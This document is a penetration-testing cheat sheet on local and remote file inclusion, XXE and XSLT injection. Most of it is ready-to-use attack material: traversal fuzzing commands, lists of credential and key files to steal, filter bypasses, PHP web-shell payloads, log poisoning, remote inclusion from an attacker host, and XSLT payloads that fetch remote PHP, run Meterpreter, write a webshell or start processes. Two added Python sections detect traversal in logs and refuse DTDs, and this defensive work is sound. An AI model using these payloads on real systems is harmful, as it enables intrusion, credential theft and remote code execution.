# LFI / XXE/XSLT

## 01. Local File Inclusion (LFI)

### 01.1 Linux

* Click [here](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_linux.txt) for the wordlist

```bash
## ------------------| Linux
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367                       
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367                       

wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367                       

## ------------------| Windows
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367 

wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w file_inclusion_windows.txt
```

* Useful LFI files

```bash
../../../etc/passwd
../../../../../../../../../../../../etc/passwd

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/var/www/html/.env
/proc/self/environ
/proc/self/cmdline
/proc/net/tcp
/proc/sched_debug
/etc/apache2/sites-available/000-default.conf
/home/ecs-user/.aws/credentials
```

* [Bypass tricks](https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt)

```bash
../index.php
../../index.php
%2e%2e%2findex.php
%252e%252e%252findex.php
../../../../etc/passwd
/var/www/../../etc/passwd
../../../../../etc/passwd%00
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//....//etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
..///////..////..//////etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

* Configuration Files

```bash
## ------------------| AWS
~/.aws/config 
/root/.aws/credentials
/home/ecs-user/.aws/config
/home/ecs-user/.aws/credentials
/home/<user>/.aws/credentials

## ------------------| Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/<hostname>.conf
/etc/apache2/sites-enabled/<subdomain-name>.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log

## ------------------| nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
/etc/nginx/sites-available/default
/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/etc/nginx/nginx.conf
/etc/nginx/proxy_params

## ------------------| MySql
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

## ------------------| Tomcat
/usr/share/tomcat9/bin/catalina.sh
/usr/share/tomcat9/etc/tomcat-users.xml
/var/lib/tomcat9/conf/tomcat-users.xml
/var/lib/tomcat9/conf/server.xml
/var/lib/tomcat9/conf/web.xml
/var/lib/tomcat9/conf/

## ------------------| Microsoft IIS (ASP .NET)
/web.config
../web.config
..././web.config 

## ------------------| Spring Boot 
application.properties
application.yml
config/application.properties
config/application.yml
src/main/java/main.java
pom.xml
static/index.html
mvnw
mvnw.cmd

## ------------------| Ruby on Rails
/Rakefile
/config/routes.rb
/config/database.yml
/config/application.rb
/storage/development.sqlite3
/config/environments/test.rb
/config/environments/production.rb
/config/environments/development.rb

## ------------------| Laravel
/var/www/html/.env
/var/www/html/index.php
/var/www/html/config/api_setting.php
/var/www/html/storage/logs/laravel.log
/var/www/html/app/Admin/routes.php

## ------------------| Flask 
app.py
/app/app.py
config.py
/app/config.py
models.py
forms.py
utils.py
templates/index.html
static/script.js
requirements.txt

## ------------------| Webroot locations
/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP
C:\wamp\www\              # WAMP
```

* Log Files

```bash
## ------------------| Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log

## ------------------| Red Hat/CentOS/Fedora Linux   
/var/log/httpd/access_log

## ------------------| Debian/Ubuntu   
/var/log/apache2/access.log

## ------------------| FreeBSD   
/var/log/httpd-access.log

## ------------------| XAMPP
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
```

* Download a running binary (enumerate processes via `/proc`)

```bash
## ------------------| Identify runnable tasks and copy the PID
/proc/sched_debug
/proc/self/cmdline

## ------------------| Get the location of the runnable process and download the file
/proc/<PID>/cmdline

## ------------------| Get linked libs
/proc/<PID>/maps

## ------------------| Get running processes
/proc/sched_debug
```

### 01.2 Windows

```bash
## ------------------| SMB?
sudo responder -I tun0 
//<IP>/hello/world
\\<IP>\hello\world
```

* Click [here](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt) for the wordlist
* File Paths

```bash
wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt

..././Windows/win.ini
/Windows/win.ini
/windows/system32/license.rtf
/Windows/System32/drivers/etc/hosts
/Windows/debug/NetSetup.log
/Users/Administrator/NTUser.dat
/Documents and Settings/Administrator/NTUser.dat
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/boot.ini
/inetpub/wwwroot/global.asa
/MySQL/data/hostname.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/my.cnf
/MySQL/my.ini
/php4/php.ini
/php5/php.ini
/php/php.ini
/Program Files/Apache Group/Apache2/conf/httpd.conf
/Program Files/Apache Group/Apache/conf/httpd.conf
/Program Files/Apache Group/Apache/logs/access.log
/Program Files/Apache Group/Apache/logs/error.log
/Program Files/FileZilla Server/FileZilla Server.xml
/Program Files/MySQL/data/hostname.err
/Program Files/MySQL/data/mysql-bin.log
/Program Files/MySQL/data/mysql.err
/Program Files/MySQL/data/mysql.log
/Program Files/MySQL/my.ini
/Program Files/MySQL/my.cnf
/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
/Program Files/MySQL/MySQL Server 5.0/my.cnf
/Program Files/MySQL/MySQL Server 5.0/my.ini
/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/access.log
/Program Files (x86)/Apache Group/Apache/conf/error.log
/Program Files (x86)/FileZilla Server/FileZilla Server.xml
/Program Files (x86)/xampp/apache/conf/httpd.conf
/WINDOWS/php.ini
/WINDOWS/Repair/SAM
/Windows/repair/system
/Windows/repair/software
/Windows/repair/security
/WINDOWS/System32/drivers/etc/hosts
/WINNT/php.ini
/WINNT/win.ini
/xampp/password
/xampp/tomcat/conf/tomcat-users.xml
/xampp/htdocs/index.php
/xampp/apache/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/Windows/Panther/Unattend/Unattended.xml
/Windows/Panther/Unattended.xml
/Windows/system32/config/AppEvent.Evt
/Windows/system32/config/SecEvent.Evt
/Windows/system32/config/default.sav
/Windows/system32/config/security.sav
/Windows/system32/config/software.sav
/Windows/system32/config/system.sav
/Windows/system32/config/regback/default
/Windows/system32/config/regback/sam
/Windows/system32/config/regback/security
/Windows/system32/config/regback/system
/Windows/system32/config/regback/software
/Program Files/MySQL/MySQL Server 5.1/my.ini
/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
/Windows/System32/inetsrv/config/applicationHost.config
/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
```

### 01.3 Wrappers & Filters

```bash
## ------------------| Basic
?page=data:text/plain,h4rithd
?page=data:text/plain,<?php system($_GET['cmd']); ?>
?page=data:text/plain,<?php echo shell_exec("whoami"); ?>

## ------------------| Base64 and rot13
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php

## ------------------| zip://
# echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php
# zip shell.zip payload.php
?page=zip://shell.zip/payload.php&cmd=whoami
?page=phar://shell.zip/payload.php&cmd=whoami
?page=zip://shell.zip%23payload.php&cmd=whoami
### you can rename it to a jpg file as well,
# mv shell.zip shell.jpg
?page=zip://shell.jpg/payload.php&cmd=whoami
?page=phar://shell.jpg/payload.php&cmd=whoami
?page=zip://shell.jpg%23payload.php&cmd=whoami

## ------------------| zlib 
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
## To read 
# php -a #Starts a php console
# readfile('php://filter/zlib.inflate/resource=test.deflated');

## ------------------| data://
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
?page=data://text/plain,<?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

## ------------------| expect://
?page=expect://id
?page=expect://ls

## ------------------| input://
?page=php://input
# POST DATA: <?php system('id'); ?>
```
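An added detection example, not from the original page, written in Python: it normalises the `page=` parameter of access-log request lines the way a PHP include would see it (repeated percent-decoding, `%c0%af` overlong UTF-8, `\` separators, slash runs) and flags the traversal spellings from the bypass list in 01.1 together with the `php://`, `data:`, `zip://`, `phar://` and `expect://` wrappers from 01.3. The log lines are constructed samples and the function names are mine.

```python
import re
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# PHP stream wrappers from the cheat sheet; none belongs in an include parameter.
WRAPPERS = ("php://", "data:", "expect://", "zip://", "phar://", "file://")
# Overlong UTF-8 spellings of '/', '\' and '.' (%c0%af is in the bypass list).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x5c": b"\\", b"\xc0\xae": b"."}


def normalize(value: str, rounds: int = 3) -> bytes:
    """Percent-decode until stable (%252e) and undo overlong UTF-8 (%c0%af)."""
    data = value.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for bad, good in OVERLONG.items():
        data = data.replace(bad, good)
    return data


def analyze_target(target: str) -> list:
    """Return findings for one request target such as '/index.php?page=...'."""
    findings = []
    for param in target.partition("?")[2].split("&"):
        name, _, raw = param.partition("=")
        norm = normalize(raw)
        if b"\x00" in norm:
            findings.append(f"{name}: null byte")
        # '\' -> '/', collapse slash runs; a dots-only segment ('..', '....') is traversal
        path = re.sub(rb"/+", b"/", norm.replace(b"\\", b"/"))
        if any(re.fullmatch(rb"\.{2,}", seg) for seg in path.split(b"/")):
            findings.append(f"{name}: path traversal")
        head = norm.lstrip(b"/").lower()
        for wrapper in WRAPPERS:
            if head.startswith(wrapper.encode()):
                findings.append(f"{name}: {wrapper} wrapper")
    return findings


def scan_log(lines: list) -> list:
    """Return (target, findings) for every log line that raised a finding."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if match and (findings := analyze_target(match["target"])):
            hits.append((match["target"], findings))
    return hits


# Constructed sample log lines (not real traffic) covering the bypass list.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1804',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd%00 HTTP/1.1" 500 0',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=..%c0%af..%c0%afetc%c0%afpasswd HTTP/1.1" 200 1804',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php HTTP/1.1" 200 3090',
]
```

Run `scan_log(SAMPLE_LOG)` to get the four flagged targets with their reasons; the benign `page=about` line produces no finding.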

### 01.4 LFI to RCEs

Typical vulnerable sink: `include($file)`, where `$file` comes straight from a request parameter.

* PHP Gadgets (New🔥)

```bash
## ------------------| 
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
```

* Log Poisoning

```bash
## ------------------| Basic Payload
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Send for apache
nc <IP> 80
...enter..payload..here!...

## Your session/auth cookies or any other session data are stored in:
## ------------------| Linux
/tmp/sess_
/var/tmp/sess_
/var/lib/php/sessions/sess_
/proc/self/environ ## <-- use for User-Agent: <?=phpinfo(); ?>
/var/log/auth.log ## <-- use ssh '<?php system($_REQUEST['cmd']); ?>'@IP
/var/log/vsftpd.log ## <-- use above payload as username with ftp
/var/log/apache2/access.log ## <-- use it from nc(BEST WAY!!) or use it as http://IP/<?php phpinfo(); ?>
 
## ------------------| Windows
\Windows\TEMP\sess_<session_id> 
c:\xampp\apache\logs\access.log&cmd=ipconfig 
```

### 01.5 Tricks

* phpinfo() (file\_uploads = on)

```bash
# Download this script
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py
```

* Video walkthrough: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)

### 01.6 LFI with python

* Click [`here`](https://docs.h4rithd.com/languages/python#02.-lfi-with-python)!

## 02. Remote File Inclusion

Requires `allow_url_include = On` in `php.ini` (it is `Off` by default).

```bash
nc -lvnp 80

## ------------------| Create payload file (php/txt)
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Execute
### move the file to /var/www/html and start the apache server
### then execute
=http://<IP>/file.txt
```

## 03. XML external entity (XXE) injection

* Common payloads

```bash
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>
        &xxe;
    </productId>
</stockCheck>
```

* Filters

```bash
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/hosts.php"> ]>
```
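An added defensive example, not from the original page: a Python gate that refuses any document carrying a DOCTYPE (and therefore any `ENTITY` declaration) before the `stockCheck` request above ever reaches the XML parser. It walks the prolog so a `<!DOCTYPE` hidden behind a comment or processing instruction is still caught, while one inside a comment is not miscounted. The element names come from the payload above; the function names and the two embedded documents are constructed by me.

```python
import xml.etree.ElementTree as ET


def doctype_present(xml_text: str) -> bool:
    """True if a DOCTYPE declaration appears in the document prolog."""
    pos, n = 0, len(xml_text)
    while pos < n:
        if xml_text[pos].isspace():
            pos += 1
        elif xml_text.startswith("<!--", pos):          # comment
            end = xml_text.find("-->", pos + 4)
            if end < 0:
                return False                            # malformed; parser rejects it
            pos = end + 3
        elif xml_text.startswith("<?", pos):            # XML declaration or PI
            end = xml_text.find("?>", pos + 2)
            if end < 0:
                return False
            pos = end + 2
        else:                                           # first real markup
            return xml_text.startswith("<!DOCTYPE", pos)
    return False


def parse_stock_check(xml_text: str) -> str:
    """Return the productId of a stockCheck request, refusing any DTD."""
    if doctype_present(xml_text):
        raise ValueError("DOCTYPE/DTD is not allowed in stockCheck requests")
    root = ET.fromstring(xml_text)
    if root.tag != "stockCheck":
        raise ValueError(f"unexpected root element {root.tag!r}")
    return (root.findtext("productId") or "").strip()


# Constructed inputs: the XXE payload from above and a benign request.
XXE_DOC = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""
CLEAN_DOC = """<?xml version="1.0"?>
<!-- order form -->
<stockCheck><productId> 381 </productId></stockCheck>"""
```

`parse_stock_check(XXE_DOC)` raises `ValueError` before parsing, while `parse_stock_check(CLEAN_DOC)` returns `"381"`.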

## [04. XSLT Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSLT%20Injection/README.md)

```bash
## ------------------| Read Files
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/fruits">
    <xsl:copy-of select="document('http://172.16.132.1:25')"/>
    <xsl:copy-of select="document('/etc/passwd')"/>
    <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
    Fruits:
     <!-- Loop for each fruit -->
    <xsl:for-each select="fruit">
      <!-- Print name: description -->
      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
    </xsl:for-each>
  </xsl:template>
</xsl:stylesheet>

## ------------------| Write Files
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exploit="http://exslt.org/common" 
  extension-element-prefixes="exploit"
  version="1.0">
  <xsl:template match="/">
    <exploit:document href="evil.txt" method="text">
      Hello World!
    </exploit:document>
  </xsl:template>
</xsl:stylesheet>

## ------------------| Remote Code Execution with PHP Wrapper
#### readfile
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of select="php:function('readfile','index.php')" />
</body>
</html>
#### scandir
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
  </xsl:template>
</xsl:stylesheet>
#### assert
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
  <xsl:variable name="payload">
    include("http://10.10.10.10/test.php")
  </xsl:variable>
  <xsl:variable name="include" select="php:function('assert',$payload)"/>
</body>
</html>
#### PHP meterpreter
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:variable name="eval">
      eval(base64_decode('Base64-encoded Meterpreter code'))
    </xsl:variable>
    <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
  </xsl:template>
</xsl:stylesheet>
#### remote php file
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
  </xsl:template>
</xsl:stylesheet>

## ------------------| Remote Code Execution with Java
  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
    <xsl:template match="/">
      <xsl:variable name="rtobject" select="rt:getRuntime()"/>
      <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
      <xsl:variable name="processString" select="ob:toString($process)"/>
      <xsl:value-of select="$processString"/>
    </xsl:template>
  </xsl:stylesheet>

## ------------------| Remote Code Execution with Native .NET
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
    <msxsl:script implements-prefix="App" language="C#">
      <![CDATA[
        public string ToShortDateString(string date)
          {
              System.Diagnostics.Process.Start("cmd.exe");
              return "01/01/2001";
          }
      ]]>
    </msxsl:script>
    <xsl:template match="ArrayOfTest">
      <TABLE>
        <xsl:for-each select="Test">
          <TR>
          <TD>
            <xsl:value-of select="App:ToShortDateString(TestDate)" />
          </TD>
          </TR>
        </xsl:for-each>
      </TABLE>
    </xsl:template>
</xsl:stylesheet>
```

